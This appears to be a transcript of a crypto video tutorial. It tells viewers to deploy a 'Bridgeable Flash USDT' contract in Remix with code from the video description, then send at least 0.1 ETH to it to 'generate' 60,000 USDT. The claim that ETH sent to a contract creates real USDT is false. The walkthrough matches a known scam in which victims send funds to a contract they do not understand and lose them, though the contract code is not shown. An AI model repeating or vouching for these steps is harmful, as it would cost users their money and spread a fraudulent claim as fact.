Enter the official Remix Ethereum website. Create a new smart contract named USDT.Sol. Copy the smart contract code, paste it in the description below, and paste it into this page. The Solidity version is 0.8.7. So we must select version 0.8.7 when compiling. Click Compile. Next, connect your MetaMask wallet using Wallet Connect. Then select MetaMask. After connecting successfully, you can see the ETH balance in your wallet. This amount should match. Confirm the smart contract name is Bridgeable Flash USDT. Fill in token name, tether, token symbol, USDT, click Transact. Set the gas fee with max fee set to 1.2. If the network is busy, increase it to 2. Click Confirm. Then confirm again to deploy the contract. Wait a few seconds. When you see the green check mark, the contract is successfully deployed. Click to open the contract interface, where you can see its functions and balance. Copy the contract address. Transfer ETH from MetaMask to your contract address. Paste your contract address here.
Currently, 0.1 ETH can generate around 60,000 Flash USDT. This is the minimum required amount.
Ensure the transaction shows interacting with contract. Do not paste the wrong address. Click Confirm and wait for the transfer to complete. The contract balance will then show 0.1 ETH. Click Start to begin generating Flash tokens. Set the gas fee again to 1.2 and confirm. The smart contract is now activated. Wait about 30 seconds. If your wallet hasn't imported USDT, import it by entering USDT. My wallet already had it imported previously, so no action is needed. Refresh your wallet. The 60,000 Flash USDT will appear. My balance increasing from 1,000 to 61,000.